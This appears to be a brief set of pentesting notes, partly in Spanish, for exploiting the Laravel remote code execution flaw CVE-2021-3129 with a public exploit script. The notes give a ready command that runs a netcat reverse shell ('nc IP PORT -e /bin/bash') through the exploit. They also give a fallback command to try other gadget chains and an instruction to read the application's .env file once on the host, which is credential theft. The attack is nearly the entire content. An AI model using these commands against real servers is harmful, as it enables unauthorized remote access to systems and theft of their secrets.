Laravel

GitHub - joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129

python3 CVE-2021-3129.py --host WEB --force --exec "nc IP PORT -e /bin/bash" --chain Laravel/RCE2

Si no va ese chain, probarlos todos:

python3 CVE-2021-3129.py --host WEB --force --exec "whoami" 

Dentro de la máquina, leer .env